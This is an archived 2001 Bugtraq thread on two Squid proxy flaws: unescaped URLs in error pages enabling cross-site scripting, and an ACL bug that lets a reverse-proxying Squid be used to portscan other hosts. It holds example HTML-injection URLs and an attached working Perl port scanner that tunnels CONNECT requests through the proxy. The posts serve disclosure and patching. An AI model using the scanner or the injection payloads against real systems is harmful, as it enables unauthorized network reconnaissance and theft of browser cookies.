6765241 2001-07-18 21:45 +0900  /59 rader/ TAKAGI, Hiromitsu <takagi@etl.go.jp>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-18  17:54  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18066>
Ärende: Squid cross-site scripting (Fw: Squid doesn't quote urls in error messages.)
------------------------------------------------------------
From: "TAKAGI, Hiromitsu" <takagi@etl.go.jp>
To: bugtraq@securityfocus.com
Message-ID: <20010718214340.14FE.TAKAGI@etl.go.jp>

The following problem is not registered on the vulnerabilities
database.
http://www.securityfocus.com/vdb/middle.html?vendor=&title=Squid%20Web%20Proxy&version=any
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=squid

Related messages:
http://www.squid-cache.org/mail-archive/squid-dev/200010/0361.html
http://www.squid-cache.org/mail-archive/squid-dev/200011/0051.html
http://www.securityfocus.com/archive/82/142120

Fix:
http://www.squid-cache.org/Versions/v2/2.4/diff-2.4.DEVEL4-2.4.PRE-STABLE.gz
http://www.squid-cache.org/Versions/v2/2.3/diff-2.3.STABLE4-2.3.STABLE5.gz

--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/

Forwarded by "TAKAGI, Hiromitsu" <takagi@etl.go.jp>
----------------------- Original Message -----------------------
 From:    Lincoln Yeoh <lyeoh@POP.JARING.MY>
 To:      VULN-DEV@SECURITYFOCUS.COM
 Date:    Fri, 27 Oct 2000 17:47:00 +0800
 Subject: Squid doesn't quote urls in error messages.
----

Hi,

I noticed that Squid 2.3.STABLE4 doesn't quote urls in error messages.

For example if a user visits the following url

http://www.dotcom.com/ <b>test</b>

The user will get an invalid url page with test in bold.

Or even more fun with: http://www.somecompany.com/<img
src="http://www.mysite.com/mylogo.gif">

You can actually get a working form in such an error message!
Javascript too.

So it may be possible to rip out other site's cookies from browsers
using this (see DKrypt's and other peoples stuff on it).

Also maybe do a fake form/page :).

I haven't really tried it myself, and so I can't confirm if it really
works (that's why it's in VULN-DEV ;) ).

Cheerio,
Link.
--------------------- Original Message Ends --------------------
(6765241) /TAKAGI, Hiromitsu <takagi@etl.go.jp>/(Ombruten)
6766278 2001-07-18 21:16 +0100  /81 rader/ Paul Nasrat <pnasrat@uk.now.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-18  22:34  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18090>
Ärende: Squid httpd acceleration acl bug enables portscanning
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Security Advisory: NASR-2001-001 <pnasrat@uk.now.com>
Date: 18 July 2001

Summary:

Squid can be used to proxy and also portscan if set up as a httpd
accelerator (reverse proxy).

Versions Affected:

2.3STABLE3 and 2.3STABLE4 unpatched 

This includes the RedHat 7.0 squid, but not RedHat 6.2 or 7.1 - 
vendors basing their RPMS on RedHat 7.0 are advised to check and 
apply the patch from the squid site.  Debian uses 2.2 and 2.4 so 
is unaffected.

Description of problem:

Squid has a known bug in 2.3STABLE4 which ignores acl's in
httpd_accel mode.  Note this is only if in httpd_accel_host is set
and httpd_accel_with_proxy off is set.  This is not the default
configuration so it is not vulnerable without making these
configuration changes.

This enables portscanning via squid running in this mode
potentially allowing remote attackers to comprimise machines through 
a squid set up this way.

I discovered this whilst doing a security test on a variety of configs
and later confirmed it from the squid site below:

http://www.squid-cache.org/Versions/v2/2.3/bugs/

Steps to Reproduce:

1. Set squid to httpd_accel mode, with a particular host and strict
   acl's

2. export httpd_proxy="http://squid-server:port"


3. lynx http://victim:port/

Actual Results:  You get a http 200 code if the port is open and
sometimes a response with some services SSH, SMTP, etc

Expected Results:  Should be access denied (403)

Discussion:

Proxies have often been used in anonymizing attacks on http, but as
more sites uuse reverse proxying as a method of distributing their
network load and load balancing requests there is the possibility
that malicious users could gain proxied access or internal
information via them.  I attach a sample squid.conf and a sample perl
portmapper taking advantage of this bug.  Squid will log you running
this so it isn't anonymous, and the task of discovering accelerated
sites automatically is left as an exercise for the reader.

Solution:  

Squid are aware of this bug and have a patch on their site.

RedHat, Immunix and others have been notified and updates
are imminent later today.  

Consider using additional security measures such as a
squid redirector, packet filtering, etc.  

Paul Nasrat

- --  "we apologise for any inconvenience" - God's Last Message to
His Creation Courtesy of Douglas Adams
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7VbucnB2rnqD9/ooRAlM2AJ4xXtjoiLpMH9PwWbh6d1KPQzTxOACgoTRA
5iTMflCCdMGKDMW8+NowgzI=
=lohz
-----END PGP SIGNATURE-----
(6766278) /Paul Nasrat <pnasrat@uk.now.com>/(Ombruten)
Bilaga (text/plain) i text 6766279
Bilaga (text/plain) i text 6766280
6766279 2001-07-18 21:16 +0100  /29 rader/ Paul Nasrat <pnasrat@uk.now.com>
Importerad: 2001-07-18  22:34  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18091>
Bilaga (text/plain) till text 6766278
Ärende: Bilaga till: Squid httpd acceleration acl bug enables portscanning
------------------------------------------------------------
# Sample Squid Config
# Paul Nasrat <pnasrat@uk.now.com>

http_port 3128

cache_mem  128 MB

refresh_pattern		^ftp:		1440	20%	10080
refresh_pattern		^gopher:	1440	0%	1440
refresh_pattern 	.		0	20%	4320

acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl SSL_ports port 443 563
acl Safe_ports 80
acl CONNECT method CONNECT

http_access allow manager localhost
http_access deny manager
http_access deny CONNECT !SSL_ports
http_access deny !Safe_ports
http_access allow localhost

httpd_accel_host localhost
httpd_accel_port 80
httpd_accel_with_proxy  off
(6766279) /Paul Nasrat <pnasrat@uk.now.com>/--------
6766280 2001-07-18 21:16 +0100  /48 rader/ Paul Nasrat <pnasrat@uk.now.com>
Importerad: 2001-07-18  22:34  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18092>
Bilaga (text/plain) till text 6766278
Ärende: Bilaga till: Squid httpd acceleration acl bug enables portscanning
------------------------------------------------------------
#!/usr/bin/perl
# Author: Paul Nasrat <pnasrat@uk.now.com>
# Date: 7 July 2001 
$|++;
require LWP::UserAgent;
use Getopt::Std;

getopts('b:P:t:L:H:',\%args);

if ($args{t} eq "") {                   # Specify a port for tomcat 
    print_help();
    exit 0;
     }

$low = $args{L} || 1;
$high = $args{H} || 8192;
$proxy = $args{b};
$proxy_port = $args{P} || 80;
$target = $args{t};



$ua = LWP::UserAgent->new;
$ua->proxy(['http', 'ftp'], "http://$proxy:$proxy_port/");
print "squidmap $version scanning $target via http://$proxy:$proxy_port\n";
print "Port\tState\t\tService\t\tResponse\n";
# for loop hard coded - fixme
for ($port=$low;$port<=$high;$port++) {
$request = HTTP::Request->new('CONNECT', "http://$target:$port");
    my $res = $ua->request($request);
    my $service = getservbyport($port, tcp);

         # Check the outcome of the response
         if ($res->is_success) {
             print "$port\topen\t\t", $service, "\t\t", $res->content, "\n";
         } 
}

sub print_help {
print 'Usage: squidmap <options> where options:',"\n";
print '-b host  HTTP proxy via host',"\n";  
print '-P ##    HTTP proxy port (default: 80)',"\n";
print '-L ##    low end/start of range (default: 1)',"\n";
print '-H ##    high end/end of range (default: 8192)',"\n";
print '-t host  target to attempt to scan',"\n";
}
(6766280) /Paul Nasrat <pnasrat@uk.now.com>/--------
6770359 2001-07-18 08:54 -0700  /37 rader/ Rude Yak <rudeyak@yahoo.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-19  18:58  av Brevbäraren
Extern mottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <18116>
Ärende: Re: Squid cross-site scripting (Fw: Squid doesn't quote urls in error messages.)
------------------------------------------------------------
From: Rude Yak <rudeyak@yahoo.com>
To: BUGTRAQ@securityfocus.com
Message-ID: <20010718155438.33344.qmail@web13301.mail.yahoo.com>


  Short term, would it be possible to remove "%U" from ERR_* in
squid/etc/errors, or does the issue apply to other %-tags in squid
templates as well?

--------------------------------------------------------------------------


I noticed that Squid 2.3.STABLE4 doesn't quote urls in error messages.

For example if a user visits the following url

http://www.dotcom.com/ <b>test</b>

The user will get an invalid url page with test in bold.

Or even more fun with: http://www.somecompany.com/<img
src="http://www.mysite.com/mylogo.gif">

You can actually get a working form in such an error message!
Javascript too.

So it may be possible to rip out other site's cookies from browsers
using this (see DKrypt's and other peoples stuff on it).

Also maybe do a fake form/page :).


__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail
http://personal.mail.yahoo.com/
(6770359) /Rude Yak <rudeyak@yahoo.com>/--(Ombruten)